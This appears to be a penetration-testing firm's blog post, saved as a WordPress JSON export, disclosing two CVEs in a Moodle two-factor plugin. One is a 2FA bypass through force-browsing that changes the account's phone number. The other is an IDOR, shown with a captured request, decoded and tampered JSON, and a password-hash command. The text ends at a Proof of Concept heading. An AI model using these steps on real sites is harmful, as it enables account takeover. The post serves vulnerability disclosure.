{"id":7426,"date":"2022-06-20T17:52:55","date_gmt":"2022-06-20T16:52:55","guid":{"rendered":"https:\/\/www.dionach.com\/?p=7426"},"modified":"2024-01-30T16:18:29","modified_gmt":"2024-01-30T16:18:29","slug":"simple-2fa-moodle-plugin","status":"publish","type":"post","link":"https:\/\/dionach.com\/en-us\/simple-2fa-moodle-plugin\/","title":{"rendered":"Simple 2FA Moodle Plugin: From 2FA Bypass to Account Takeover"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Author:<\/strong> Flaviu Popescu – Technical Consultant<\/p>

Introduction<\/h2>

There are times as a penetration tester that you find something unique. It may not be unique in the field of cyber security but unique to the tester themselves. This was one of those times. During testing on a web application, a couple of interesting discoveries were made. One of which was a security vulnerability that was discovered within the “Simple 2FA Plugin by LMS Doctor”.<\/p>

The mentioned product is a plugin used in the Moodle content management software that aims to add an extra layer to the authentication process, thereby making the web application more secure. The plugin provides this by sending a user a randomly generated six-digit code to their mobile device or email address, as part of the two-factor authentication process. The vulnerabilities allow a remote attacker to gain access to user accounts impacting the confidentiality and integrity of information stored within the website.<\/p>

Technical Details<\/h2>

1.\u00a0\u00a0\u00a0\u00a0\u00a0 Two-Factor Authentication bypass (CVE-2022-28601):<\/h3>

The example below shows the initial login process using a self-registered account:<\/p>

POST \/login\/index.php<\/h3>

\"\"<\/p>

After entering their username and password, the website sends the account owner a six-digit code to their mobile device, which then has to be submitted on the next page as shown below:<\/p>

POST \/auth\/simple2fa\/confirm.php<\/h3>

\"\"<\/p>

Unfortunately, an attacker could then force browse directly to the profile page at the following URL instead of providing the 2FA code. Here, they are able to update the phone number registered to the account.<\/p>

POST \/auth\/simple2fa\/profile.php<\/h3>

\"\"<\/p>

As you might expect, this allows the attacker to insert their own phone number for the target account, with the aim of having the second-factor code now sent to the attacker instead. The login process is then repeated, but this time the six-digit pin code will be received on the attacker’s device.<\/p>

The newly generated six-digit pin code is then passed into the 2FA authentication portal which now indeed shows the attacker’s phone number.<\/p>

POST \/auth\/simple2fa\/confirm.php<\/h3>

\"\"<\/p>

The attacker is then granted access to the website, effectively bypassing the second stage of the authentication process entirely.<\/p>

\u00a0<\/p>

2. Insecure direct object references (IDOR) vulnerability (CVE-2022-28986):<\/h3>

Initial login process using a self-registered account:<\/p>

POST \/login\/index.php<\/h3>

\"\"<\/p>

Once the 2FA prompt is shown, the attacker force browses to the following URL instead of providing the 2FA code.<\/p>

POST \/auth\/simple2fa\/profile.php<\/h3>

\"\"<\/p>

This request is then captured in Burp Suite and looks as follows:<\/p>

Host:\n[..]\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.74 Safari\/537.36\nu=eyJpZCI6IjgwNDUiLCJhdXRoIjoiZW1haWw[..]QiLCJzZWNyZXQiOiJqOFVNYWwwOVg2eWtqNFkiLCJwaWN0dXJlIjoiMCIsInVybCI6IiIsImRlc2Ny<\/strong>&sesskey=D0V41GZAkM&_qf__profile_form=1&phonenumber=%2B44[..]558&submitbutton=Confirm\n<\/pre>
The parameter “u” contains a base64 encoded string. Decoding this string reveals data in JSON format as shown in the snippet below:<\/p>
{\"id\":\"7834<\/strong>\",\"auth\":\"email\",\"confirmed\":\"1\",\"policyagreed\":\"0\",\"deleted\":\"0\",\"suspended\":\"0\",\"mnethostid\":\"1\",\"username\":\"dionach.tester<\/strong>\",\"password\":\"$2y$10$6U\\\/HgxK3Rn1N3dqYecBtxOEcXBshBYJdFD\\\/Ix.S.U\\\/oz\\\/\\\/dkrxize<\/strong>\",\"idnumber\":\"\",\"firstname\":\"External<\/strong>\",\"lastname\":\"Student<\/strong>\",\"email\":\"flaviu.popescu@www.dionach.com<\/strong>\",\"emailstop\":\"0\",\"icq\":\"\",\"skype\":\"\",\"yahoo\":\"\",\"aim\":\"\",\"msn\":\"\",\"phone1\":\"\",\"phone2\":\"+4474*****558\"}<\/pre>
The attacker can attempt to tamper with the JSON data before sending it off to the server, modifying parameters such as the id, e-mail and password field, which contains a bcrypt hash of the users’ password.<\/p>
The JSON data is tampered, encoded back into base64 and the POST request is forwarded to the server in Burp Suite.<\/p>
New hash generation for the password:<\/p>
$ htpasswd -bnBC 10 \"\" pwn3d! | tr -d ':\\n'\\n\n$2y$10$g\/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy<\/strong><\/pre>
Snippet of tampered data:<\/p>
{\"id\":\"8045<\/strong>\",\"auth\":\"email\",\"confirmed\":\"1\",\"policyagreed\":\"0\",\"deleted\":\"0\",\"suspended\":\"0\",\"mnethostid\":\"1\",\"username\":\"dionach.tester2<\/strong>\",\"password\":\"$2y$10$g\/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy<\/strong>\",\"idnumber\":\"\",\"firstname\":\"Victim<\/strong>\",\"lastname\":\"Account Taken<\/strong>\",\"email\":\"attacker@moodle.org<\/strong>\"}<\/pre>
The server then updates the account information based on the “id” number supplied in the above JSON data, resulting in the victim’s account with id 8045 (dionach.tester2) being updated as shown below:<\/p>
\"\"<\/p>
\u00a0<\/p>
Proof of Concept<\/span><\/h2>
2FA bypass vulnerability.<\/span><\/h3>